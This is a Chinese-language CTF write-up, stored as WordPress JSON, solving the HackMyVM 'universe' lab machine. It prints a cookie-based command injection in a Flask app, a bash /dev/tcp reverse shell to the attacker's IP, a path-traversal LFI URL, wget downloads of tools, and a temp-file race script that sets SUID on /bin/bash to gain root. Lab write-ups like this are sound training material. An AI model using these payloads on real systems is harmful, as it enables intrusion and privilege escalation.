{"id":421,"date":"2024-03-19T02:52:03","date_gmt":"2024-03-18T18:52:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=421"},"modified":"2024-03-19T02:52:03","modified_gmt":"2024-03-18T18:52:03","slug":"hmv-_-universe","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/421\/03\/19\/2024\/","title":{"rendered":"hmv[-_-]universe"},"content":{"rendered":"

universe(hard)<\/h1>\n

\u4e0b\u8f7d\u597d\u4e3b\u673a\uff0c\u8fdb\u884c\u626b\u63cf\u4e00\u4e0b\u662f\u5426\u914d\u7f6e\u597d\u4e86\uff0c\u6211\u4e60\u60ef\u4f7f\u7528vmware<\/code>\uff0c\u6240\u4ee5\u628avirtualbox<\/code>\u865a\u62df\u673a\u6309\u7167\u5f00\u653e\u865a\u62df\u53161.0\u534f\u8bae<\/code>\uff0c\u5bfc\u51fa\u518d\u653e\u8fdbvmware<\/code>\u5347\u7ea7\uff0c\u5c31\u53ef\u4ee5\u7528\u4e86\uff1a<\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\"image-20240314191527111\"<\/div><\/p>\n

\u626b\u51fa\u6765\u4e86\uff01<\/p>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
nmap -Pn -p- 10.161.61.131<\/code><\/pre>\n
Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-14 07:16 EDT\nNmap scan report for 10.161.61.131\nHost is up (0.0015s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n21\/tcp   open  ftp\n22\/tcp   open  ssh\n1212\/tcp open  lupa<\/code><\/pre>\n
\u5c1d\u8bd5\u5f31\u5bc6\u7801\u6216\u8005\u65e0\u5bc6\u7801\u767b\u5f55ftp\uff0cssh\uff0c\u7686\u65e0\u679c\uff0c\u8bbf\u95ee1212\u7aef\u53e3\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n
\"image-20240314191829725\"<\/div><\/p>\n
\u53d1\u73b0\u52309\u7684\u65f6\u5019\u6709\u8fd9\u4e2a\u7f51\u9875\u51fa\u73b0\uff1a<\/p>\n
\"image-20240314192718594\"<\/div><\/p>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n
cookie\u6ce8\u5165<\/h3>\n
\u5c1d\u8bd5cookie\u6ce8\u5165\uff1a<\/p>\n
\"image-20240314192808554\"<\/div><\/p>\n
\u8bf4\u660e\u5b83\u8bc6\u522b\u4e86\uff0c\u77e5\u8bc6cookie\u503c\u6ca1\u6709\u88ab\u63a5\u6536\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7f16\u7801\u5904\u7406\u3002<\/p>\n
\u8fd9\u91cc\u6211\u6539\u6210id\u4e86\uff1a<\/p>\n
\"image-20240314193428665\"<\/div><\/p>\n
\u53cd\u5f39shell<\/h3>\n
\u8bf4\u660e\u662f\u53ef\u4ee5\u8fdb\u884c\u6ce8\u5165\u7684\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
bash -c 'exec bash -i &>\/dev\/tcp\/10.161.61.130\/1234 <&1'\nYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTYxLjYxLjEzMC8xMjM0IDwmMSc=<\/code><\/pre>\n
\"image-20240314194008216\"<\/div><\/p>\n
\u83b7\u5f97\u4e86\u4e00\u4e2ashell\u3002<\/p>\n
\u63d0\u6743<\/h2>\n
\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h3>\n
bash: cannot set terminal process group (436): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.2$ whoami;id\nwhoami;id\nmiwa\nuid=1000(miwa) gid=1000(miwa) groups=1000(miwa)\nbash-5.2$ uname -a\nuname -a\nLinux universe 6.1.0-17-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.69-1 (2023-12-30) x86_64 GNU\/Linux\nbash-5.2$ crontab -l\ncrontab -l\nno crontab for miwa\nbash-5.2$ find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/bash\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper <\/code><\/pre>\n
\u4f3c\u4e4e\u6ca1\u6709\u5730\u65b9\u53ef\u4ee5\u5229\u7528\uff0c\u5148\u4f20\u4e00\u4e2a\u516c\u94a5\u4e0a\u53bb\u5c31\u53ef\u4ee5ssh\u767b\u5f55\u4e86\uff1a<\/p>\n
\"image-20240314195740985\"<\/div><\/p>\n
\u53cd\u7167\u53d1\u73b0\u4e4b\u524d\u518d\u5c1d\u8bd5\u7684\u90a3\u4e2auser=xx<\/code>\u7684\u6e90\u7801\uff1a<\/p>\n
from flask import Flask, render_template, request, make_response, redirect, url_for\nimport subprocess\nimport base64\nimport random\n\napp = Flask(__name__)\n\nuser_id_range = range(1, 1001)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return redirect(url_for('index', user=random.choice(user_id_range)))\n\n@app.route('\/')\ndef index():\n    try:\n        user_id = int(request.args.get('user', -1))\n    except ValueError:\n        return redirect(url_for('index', user=random.choice(user_id_range)))\n\n    if not isinstance(user_id, int) or user_id not in user_id_range:\n        user_id = random.choice(user_id_range)\n        return redirect(url_for('index', user=user_id))\n\n    if user_id == 9:\n        encoded_command = request.cookies.get('exec', '')\n        if encoded_command:\n            try:\n                command = base64.b64decode(encoded_command).decode()\n                result = subprocess.check_output(command, shell=True).decode()\n                return render_template('universe.html', result=result)\n            except Exception as e:\n                return render_template('universe.html', result="Invalid cookie value"), 500\n        else:\n            return render_template('universe.html', result="Missing 'exec' cookie")\n\n    return render_template('index.html', user_id=user_id), 403\n\nif __name__ == '__main__':\n    app.run(host="0.0.0.0", port=1212)<\/code><\/pre>\n
\u7aef\u53e3\u8f6c\u53d1\u4e00\u4e0b\uff0c\u5148\u4f20\u4e00\u4e2asocat<\/code>\u4e0a\u53bb\uff1a<\/p>\n
# kali\npython3 -m http.server 8888\n# miwa\ncd \/tmp\nwget http:\/\/10.161.61.130:8888\/socat\nchmod +x socat\n.\/socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:8080 &<\/code><\/pre>\n
\u63d0\u6743\u5230void\u7528\u6237<\/h3>\n
\u8fd9\u4e2a\u65f6\u5019\u7fa4\u4e3b\u5927\u5927ll104567<\/a>\u53d1\u73b0\u4e86\u4e00\u4e2aLFI\u6f0f\u6d1e\uff1a<\/p>\n
http:\/\/10.161.61.131:8000\/?file=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n
\"image-20240316015441233\"<\/div><\/p>\n
\u8fd9\u65f6\u5019\u6211\u72af\u75c5\u4e86\uff0c\u6ca1\u770b\u61c2\u82f1\u6587\uff0c\u6211\u8fd8\u50bb\u4e4e\u4e4e\u7684\u95ee\u7fa4\u4e3b\u54ea\u6709\u5bc6\u7801\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u4e0a\u4f20\u53cd\u5f39shell\uff0c\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u4f4f\uff1a<\/p>\n
\"image-20240316015800365\"<\/div><\/p>\n
\u83b7\u53d6\u5230\u4e86shell\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0bflag\uff1a<\/p>\n
$ cd \/home\/void\n$ ls\npayload.sh\nuser.txt\nweb-void\n$ cat user.txt\nvoid{70zHEmM1WJL0jjm2WBorHVEQj}<\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
$ whoami;id\nvoid\nuid=1001(void) gid=1001(void) groups=1001(void)\n$ crontab -l\nno crontab for void\n$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/bash\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n$ uname -a\nLinux universe 6.1.0-17-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.69-1 (2023-12-30) x86_64 GNU\/Linux <\/code><\/pre>\n
\u627e\u5230\u4e86\u5bc6\u7801\uff1a<\/p>\n
$ cd \/home\/void\n$ ls -la\ntotal 48\ndrwx------ 5 void void 4096 Mar 13 15:26 .\ndrwxr-xr-x 4 root root 4096 Jan 30 10:35 ..\nlrwxrwxrwx 1 root root    9 Jan 30 12:35 .bash_history -> \/dev\/null\n-rw-r--r-- 1 void void  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 void void 3526 Apr 23  2023 .bashrc\ndrwxr-xr-x 3 void void 4096 Jan 30 10:43 .local\n-rwx------ 1 void void   18 Jan 30 17:26 .pass\n-rwxr-xr-x 1 void void  153 Mar 13 09:10 payload.sh\n-rw-r--r-- 1 void void  807 Apr 23  2023 .profile\n-rw------- 1 void void    7 Mar 13 14:03 .python_history\ndrwxrwxrwx 2 void void 4096 Mar 13 13:48 .ssh\n-rwx------ 1 void void   32 Jan 31 11:38 user.txt\ndrwx------ 2 void void 4096 Jan 30 10:44 web-void\n$ cat .pass\nCg78F6WT8HkSBiG71<\/code><\/pre>\n
ssh\u767b\u5f55void<\/h4>\n
ssh void@10.161.61.130<\/code><\/pre>\n
\u4f20\u4e00\u4e2alinpeans.sh<\/code>\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n
-bash-5.2$ cd \/tmp\n-bash-5.2$ wget http:\/\/10.161.61.130:8888\/linpeas.sh\n--2024-03-15 20:19:28--  http:\/\/10.161.61.130:8888\/linpeas.sh\nConnecting to 10.161.61.130:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 332111 (324K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh              100%[==============================>] 324.33K  --.-KB\/s    in 0.004s  \n\n2024-03-15 20:19:28 (80.2 MB\/s) - \u2018linpeas.sh\u2019 saved [332111\/332111]\n\n-bash-5.2$ chmod +x linpeas.sh\n-bash-5.2$ .\/linpeas.sh<\/code><\/pre>\n
\u627e\u5230\u4e86\u51e0\u4e2a\u53ef\u7591\u6587\u4ef6\uff1a0anacron<\/code>\u3001\/scripts\/Quasar<\/code>\u540e\u8005\u4e0d\u9700\u8981\u5bc6\u7801\u5c31\u53ef\u4ee5\u4ee5root\u6743\u9650\u6267\u884c\uff01\uff01<\/p>\n
\"image-20240316022408325\"<\/div><\/p>\n
\u4e14\u6ca1\u6709gdb\uff1a<\/p>\n
\"image-20240316022436904\"<\/div><\/p>\n
\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff1a\u50bb\u4e86\u5c45\u7136\u5fd8\u4e86:<\/p>\n
-bash-5.2$ sudo -l\nMatching Defaults entries for void on universe:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser void may run the following commands on universe:\n    (root) NOPASSWD: \/scripts\/Quasar<\/code><\/pre>\n
# print.sh\n#!\/usr\/bin\/env bash\ntmp_file=$(\/usr\/bin\/mktemp -u \/tmp\/read-XXXXX)\n( \n    umask 110\n    \/usr\/bin\/touch "$tmp_file";\n)\n\/usr\/bin\/echo "test" > "$tmp_file"\ndata=$(\/usr\/bin\/cat "$tmp_file")\neval "$data"\n\/usr\/bin\/rm "$tmp_file"<\/code><\/pre>\n
bash-5.2$ file Quasar\nQuasar: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=00a219f57c37379e9a7d16a82edc8463bf5c4b8e, for GNU\/Linux 4.4.0, stripped<\/code><\/pre>\n
\u96be\u9053\u8981pwn<\/code>\uff1f\uff1f\uff1f\uff1f\uff1f<\/p>\n
\u521a\u521a\u4fe1\u606f\u641c\u96c6\u7684\u65f6\u5019\u53d1\u73b0\u4e3b\u673a\u4e0a\u88c5\u4e86python\uff0c\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n
# void\npython3 -m http.server 8899\n# kali\nwget http:\/\/10.161.61.131:8899\/Quasar<\/code><\/pre>\n
\u62ff\u5230 IDA \u770b\u4e00\u4e0b\uff1a<\/p>\n
\/\/ main\n__int64 __fastcall main(int a1, char **a2, char **a3)\n{\n  char s1; \/\/ [rsp+10h] [rbp-A8h]\n  char s2; \/\/ [rsp+60h] [rbp-58h]\n  unsigned __int64 v6; \/\/ [rsp+A8h] [rbp-10h]\n\n  v6 = __readfsqword(0x28u);\n  if ( a1 == 2 )                    \/\/\u5224\u65ad\u547d\u4ee4\u884c\u8f93\u5165\u53c2\u6570\u4e2a\u6570\uff0c\u9700\u4e3a2\n  {\n    sub_1219(&s1, a2, a3);          \/\/\u6839\u636e\u7b97\u6cd5\u751f\u6210s1\n    sub_1414(&s1, &s1);             \/\/\u5bf9s1\u8fdb\u884csha256\u52a0\u5bc6\n    sub_1414(a2[1], &s2);           \/\/\u5bf9s2\u8fdb\u884c\u76f8\u540c\u7684\u52a0\u5bc6\n    if ( !strcmp(&s1, &s2) )        \/\/\u68c0\u67e5\u70b9\n      system("\/scripts\/print.sh");\n    else\n      printf(&byte_2038, &s2, a2);\n  }\n  else\n  {\n    puts("Uso: .\/Quasar <password>");\n  }\n  return 0LL;\n}<\/code><\/pre>\n
\/\/ sub_1219\nsigned __int64 __fastcall sub_1219(__int64 a1)\n{\n  double v1; \/\/ xmm0_8\n  double v2; \/\/ ST08_8\n  double v3; \/\/ ST08_8\n  double v4; \/\/ xmm0_8\n  int v5; \/\/ eax\n  signed __int64 result; \/\/ rax\n  double v7; \/\/ [rsp+8h] [rbp-30h]\n  signed int i; \/\/ [rsp+20h] [rbp-18h]\n  signed int j; \/\/ [rsp+24h] [rbp-14h]\n  double v10; \/\/ [rsp+28h] [rbp-10h]\n\n  for ( i = 0; i <= 9; ++i )\n  {\n    v10 = 0.0;\n    for ( j = 0; j <= 4; ++j )\n    {\n      v1 = sin(3.141592653589793 * (double)i \/ 3.0 + (double)j);\n      v2 = pow(v1, 2.0);\n      v3 = log((double)(i + j + 3)) * v2;\n      v4 = sqrt((double)(i + j + 1));\n      v7 = exp(v4) + v3;\n      v5 = i + j + 1;\n      if ( (unsigned int)(i + j) < 0xFFFFFFFE && i + j != 0 )\n        v5 = 0;\n      v10 = tgamma((double)(i + j + 1)) * (double)v5 + v7 + v10;\n    }\n    *(_BYTE *)(i + a1) = (signed int)(100.0 * v10) % 10 + 48;\n  }\n  result = a1 + 10;\n  *(_BYTE *)(a1 + 10) = 0;\n  return result;\n}<\/code><\/pre>\n
\/\/sub_1414\nunsigned __int64 __fastcall sub_1414(__int64 a1, __int64 a2)\n{\n  signed int i; \/\/ [rsp+1Ch] [rbp-ACh]\n  char v4; \/\/ [rsp+20h] [rbp-A8h]\n  char v5[40]; \/\/ [rsp+90h] [rbp-38h]\n  unsigned __int64 v6; \/\/ [rsp+B8h] [rbp-10h]\n\n  v6 = __readfsqword(0x28u);\n  SHA256_Init(&v4);\n  SHA256_Update(&v4, a1, 10LL);\n  SHA256_Final(v5, &v4);\n  for ( i = 0; i <= 31; ++i )\n    sprintf((char *)(a2 + 2 * i), "%02x", (unsigned __int8)v5[i]);\n  *(_BYTE *)(a2 + 64) = 0;\n  return v6 - __readfsqword(0x28u);\n}<\/code><\/pre>\n
\u8c03\u8bd5\u4e00\u4e0b<\/h3>\n
\u7fa4\u91cc\u7684bamuwe<\/code>\u5e08\u5085\u8fdb\u884c\u8c03\u8bd5\u7684\uff0c\u8fd9\u91cc\u5b66\u4e60\u4e00\u4e0b\uff01\uff08\u819c\u62dc\uff09\uff0c\u4e0a\u9762\u7684\u6ce8\u91ca\u5c31\u662fbamuwe<\/code>\u5e08\u5085\u6ce8\u91ca\u7684\uff0c\u8fd9\u91cc\u76f4\u63a5\u8bb0\u5f55\u4e00\u4e0b\u4e86\uff0c\u987a\u4fbf\u3002\u3002<\/p>\n
\"image-20240316023757778\"<\/div><\/p>\n
\u7b2c\u516b\u884c\u6253\u4e00\u4e2a\u65ad\u70b9\uff1a<\/p>\n
\"image-20240316024223313\"<\/div><\/p>\n
\u5bf9\u4e86\uff0c\u8c03\u8bd5\u5668\u6211\u4eec\u9009\u62e9\u8fdc\u7a0b linux \u8c03\u8bd5\uff0c\u628a\u6587\u4ef6\u4e22\u5230\u865a\u62df\u673a\u5185\u8fd0\u884c\uff1a<\/p>\n
\"image-20240319015807643\"<\/div><\/p>\n
\u5c31\u662f\u8fd9\u4e2a\uff01<\/p>\n
\"image-20240319015931024\"<\/div><\/p>\n
\u5c31\u50cf\u8fd9\u6837\uff0c\u7136\u540e\u8bbe\u7f6e\u8c03\u8bd5\u5668\uff1a<\/p>\n
\"image-20240319020017706\"<\/div><\/p>\n
\u7136\u540e\u628a\u4f60\u7684\u865a\u62df\u673a ip \u5730\u5740\uff08\u865a\u62df\u673a\u4e0e\u4e3b\u673a\u4e4b\u95f4\u9700\u8981\u53ef\u4ee5\u4e92\u76f8ping\u901a\u54e6\uff01\uff09\u586b\u8fdb\u53bb\u5c31\u884c\u4e86\uff01<\/p>\n
F5\u53cd\u7f16\u8bd1\u4e00\u4e0b<\/h4>\n
\"image-20240319020541902\"<\/div><\/p>\n
\u9664\u4e86\u4e0a\u9762\u90a3\u4e2a\u5730\u65b9\u8fd8\u6709\u4e2a\u5730\u65b9\uff1a<\/p>\n
\"image-20240319020807114\"<\/div><\/p>\n
\u6253\u5b8c\u65ad\u70b9\u4ee5\u540e\u5f00\u59cb\u8c03\u8bd5\uff1a<\/p>\n
\"image-20240319020833327\"<\/div><\/p>\n
\u6211\u4eec\u6539\u6210\u6c47\u7f16\u4ee3\u7801\uff0c\u76f4\u89c2\u4e00\u70b9\uff0cF8<\/code>\u6b65\u8fdb\u5230\u5224\u65ad\u5904\uff1a<\/p>\n
\"image-20240319021720467\"<\/div>\u67e5\u770b\u6c47\u7f16\u624b\u518c\u53ef\u4ee5\u77e5\u9053\uff1aJZ<\/code> \u5728ZF = 0<\/code>\u65f6\u8fd1\u8df3\u8f6c\uff0c\u6211\u4eec\u4e0d\u80fd\u8ba9\u4ed6\u8df3\u8f6c\uff08\u8df3\u8f6c\u5c31\u7ed3\u675f\u4e86)<\/p>\n
\"image-20240319022401927\"<\/div><\/p>\n
\u6211\u4eec\u628aZF<\/code>\u6539\u4e3a1\uff0c\u6b65\u5165\u51fd\u6570\uff0c\u6ca1\u5565\u4e8b\u4e86\uff0c\u76f4\u63a5\u8ba9\u4ed6F9 continue<\/code>\u5230\u4e0b\u4e00\u4e2a\u65ad\u70b9\uff1a<\/p>\n
\"image-20240319023916717\"<\/div><\/p>\n
\u53ef\u4ee5\u770b\u5230\u5728\u8fd9\u91cc\uff0c\u5b83\u5c06\u503c\u5b58\u653e\u5230\u4e86rax<\/code>\u91cc\uff0c\u6211\u4eec\u770b\u4e00\u4e0brax<\/code>\u503c\u662f\u591a\u5c11\uff01<\/p>\n
\"image-20240319024258489\"<\/div><\/p>\n
\u70b9\u51fb\u5730\u5740\u8fdb\u5165\uff0c\u6216\u8005\u76f4\u63a5\u70b9\u51fb\u524d\u9762\u7684rax<\/code>\u4e5f\u884c\uff01<\/p>\n
\u5f97\u5230rax<\/code>\u5728\u6808\u91cc\u5b58\u7684\u6570\u5b57\u4e86\uff01shift+e<\/code>\u5373\u53ef\u53d6\u51fa\u6765\uff1a<\/p>\n
\"image-20240319024725228\"<\/div><\/p>\n
\u6240\u5f97\u6570\u5b57\u4e3a9740252204<\/code>\u3002\u8fd0\u884c\u4e00\u4e0b\uff0c\u53d1\u73b0\u662f\u6b63\u786e\u7684\uff01<\/p>\n
\u811a\u672c\u63d0\u6743<\/h3>\n
\u662f\u7fa4\u4e3b\u5927\u5927\u8d21\u732e\u7684\uff1a<\/p>\n
# \u4e00\u4ee3\nfor i in $(seq 100000);\ndo\ncat \/tmp\/read-* 2>\/dev\/null;\nfilename=$(ls \/tmp\/read*)\n[[ ! -z "$filename" ]] && echo 'chmod +s \/bin\/bash'  > $filename\ndone<\/code><\/pre>\n
    \n
  1. \u4f7f\u7528seq 100000<\/code>\u751f\u6210\u4e00\u4e2a\u4ece1\u5230100000\u7684\u5e8f\u5217\u3002<\/li>\n
  2. \u5728\u6bcf\u6b21\u5faa\u73af\u4e2d\uff0c\u4f7f\u7528cat \/tmp\/read-* 2>\/dev\/null<\/code>\u547d\u4ee4\u5c1d\u8bd5\u8bfb\u53d6\/tmp\/read-*<\/code>\u5339\u914d\u7684\u6587\u4ef6\uff0c\u5e76\u5c06\u5176\u5185\u5bb9\u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa\u30022>\/dev\/null<\/code>\u5c06\u6807\u51c6\u9519\u8bef\u91cd\u5b9a\u5411\u5230\u7a7a\u8bbe\u5907\uff0c\u4ee5\u907f\u514d\u663e\u793a\u4efb\u4f55\u53ef\u80fd\u7684\u9519\u8bef\u6d88\u606f\u3002<\/li>\n
  3. \u4f7f\u7528ls \/tmp\/read*<\/code>\u547d\u4ee4\u5217\u51fa\/tmp\/read*<\/code>\u5339\u914d\u7684\u6587\u4ef6\uff0c\u5e76\u5c06\u7ed3\u679c\u5b58\u50a8\u5728\u53d8\u91cffilename<\/code>\u4e2d\u3002<\/li>\n
  4. \u5982\u679cfilename<\/code>\u53d8\u91cf\u4e0d\u4e3a\u7a7a\uff08\u5373\u5b58\u5728\u5339\u914d\u7684\u6587\u4ef6\uff09\uff0c\u5219\u5c06\u5b57\u7b26\u4e32chmod +s \/bin\/bash<\/code>\u5199\u5165\u5230\u5339\u914d\u7684\u6587\u4ef6\u4e2d\u3002<\/li>\n
  5. \u5faa\u73af\u91cd\u590d\u4e0a\u8ff0\u6b65\u9aa4\uff0c\u76f4\u5230\u5faa\u73af\u6b21\u6570\u8fbe\u5230100000\u3002<\/li>\n<\/ol>\n
    \u8981\u6c42\uff1a<\/p>\n
    \"image-20240314201253891\"<\/div>
    \n
    \"image-20240314201449365\"<\/div><\/p>\n
    \u7136\u540els -l \/bin\/bash<\/code><\/pre>\n
    \u8fd9\u4e2a\u6211\u6ca1\u6210\u529f\uff0c\u6b63\u597d\u7fa4\u4e3b\u5927\u5927\u53c8\u5f00\u51fa\u4e86\u4e8c\u4ee3\uff1a<\/p>\n
    # \u4e8c\u4ee3\nfor i in $(seq 100000);\ndo\nfilename=$(ls \/tmp\/read* 2>\/dev\/null)\n[[ ! -z "$filename" ]] && echo 'cat \/root\/root.txt'  > $filename 2>\/dev\/null\ndone<\/code><\/pre>\n
    sudo \/scripts\/Quasar 9740252204<\/code><\/pre>\n
      \n
    1. \u4f7f\u7528seq 100000<\/code>\u751f\u6210\u4e00\u4e2a\u4ece1\u5230100000\u7684\u5e8f\u5217\u3002<\/li>\n
    2. \u5728\u6bcf\u6b21\u5faa\u73af\u4e2d\uff0c\u4f7f\u7528ls \/tmp\/read* 2>\/dev\/null<\/code>\u547d\u4ee4\u5217\u51fa\/tmp\/read*<\/code>\u5339\u914d\u7684\u6587\u4ef6\uff0c\u5e76\u5c06\u7ed3\u679c\u5b58\u50a8\u5728\u53d8\u91cffilename<\/code>\u4e2d\u30022>\/dev\/null<\/code>\u5c06\u6807\u51c6\u9519\u8bef\u91cd\u5b9a\u5411\u5230\u7a7a\u8bbe\u5907\uff0c\u4ee5\u907f\u514d\u663e\u793a\u4efb\u4f55\u53ef\u80fd\u7684\u9519\u8bef\u6d88\u606f\u3002<\/li>\n
    3. \u5982\u679cfilename<\/code>\u53d8\u91cf\u4e0d\u4e3a\u7a7a\uff08\u5373\u5b58\u5728\u5339\u914d\u7684\u6587\u4ef6\uff09\uff0c\u5219\u5c06\u5b57\u7b26\u4e32cat \/root\/root.txt<\/code>\u5199\u5165\u5230\u5339\u914d\u7684\u6587\u4ef6\u4e2d\u3002\u8fd9\u4f1a\u5c1d\u8bd5\u5c06\/root\/root.txt<\/code>\u7684\u5185\u5bb9\u5199\u5165\u5230\u5339\u914d\u7684\u6587\u4ef6\u4e2d\u3002<\/li>\n
    4. \u5faa\u73af\u91cd\u590d\u4e0a\u8ff0\u6b65\u9aa4\uff0c\u76f4\u5230\u5faa\u73af\u6b21\u6570\u8fbe\u5230100000<\/li>\n<\/ol>\n
      \u5c1d\u8bd5\u4e00\u4e0b\uff01\u4f46\u662f\u6211\u4e00\u76f4\u4f7f\u7528\u4e0d\u4e86\uff1a<\/p>\n
      \"image-20240316030546903\"<\/div><\/p>\n
      \u767b\u5f55\u4e0a\u53bb\u662f-bash-5.2<\/code>\u5b57\u6837\u7684\uff0c\u9ebb\u4e86\uff0c\u7f51\u4e0a\u5012\u6709\u89e3\u51b3\u529e\u6cd5\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
      cp \/etc\/skel\/.bashrc \/home\/void\/    \ncp \/etc\/skel\/.profile  \/home\/void\/\ncp \/etc\/skel\/.bash_logout \/home\/void\/<\/code><\/pre>\n
      \u6ca1\u6210\u529f\u3002\u3002\u3002\u4f46\u662f\u53ef\u4ee5\u6267\u884c\u4e86\uff01\u51e0\u79cd\u4fe1\u606f\uff1a<\/p>\n
      ls: cannot access '\/tmp\/read*': No such file or directory\ntest\nchmod +s \/bin\/bash\n.\/payload.sh: line 6: $filename: ambiguous redirect<\/code><\/pre>\n
      \u778e\u64cd\u4f5c\uff0c\u6700\u7ec8\u83b7\u53d6\u5230\u4e86flag\uff0c\u7fa4\u4e3b\u725b\u6279\uff01<\/p>\n
      -bash-5.2$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n-bash-5.2$ id\nuid=1001(void) gid=1001(void) groups=1001(void)\n-bash-5.2$ bash\nbash-5.2$ whoami;id\nvoid\nuid=1001(void) gid=1001(void) groups=1001(void)\nbash-5.2$ cd \/root\nbash: cd: \/root: Permission denied\nbash-5.2$ cat \/root\/root.txt\ncat: \/root\/root.txt: Permission denied\nbash-5.2$ bash -p\nbash-5.2# whoami;id\nroot\nuid=1001(void) gid=1001(void) euid=0(root) egid=0(root) groups=0(root),1001(void)\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 32\ndrwx------  4 root root 4096 Jan 31 11:37 .\ndrwxr-xr-x 19 root root 4096 Jan 30 11:00 ..\nlrwxrwxrwx  1 root root    9 Jan 30 12:33 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\n-rw-------  1 root root   20 Jan 30 11:31 .lesshst\ndrwxr-xr-x  3 root root 4096 Jan 30 09:51 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Jan 30 09:57 .python_history\n-rwx------  1 root root   32 Jan 31 11:37 root.txt\ndrwx------  2 root root 4096 Jan 30 15:20 .ssh\nbash-5.2# cat root.txt\nroot{k7Ei4kA88gtL957yYbWdRfVJg}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
      universe(hard) \u4e0b\u8f7d\u597d\u4e3b\u673a\uff0c\u8fdb\u884c\u626b\u63cf\u4e00\u4e0b\u662f\u5426\u914d\u7f6e\u597d\u4e86\uff0c\u6211\u4e60\u60ef\u4f7f\u7528vmware\uff0c\u6240\u4ee5\u628avirtua […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,22,18],"tags":[],"class_list":["post-421","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=421"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/421\/revisions"}],"predecessor-version":[{"id":422,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/421\/revisions\/422"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=421"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}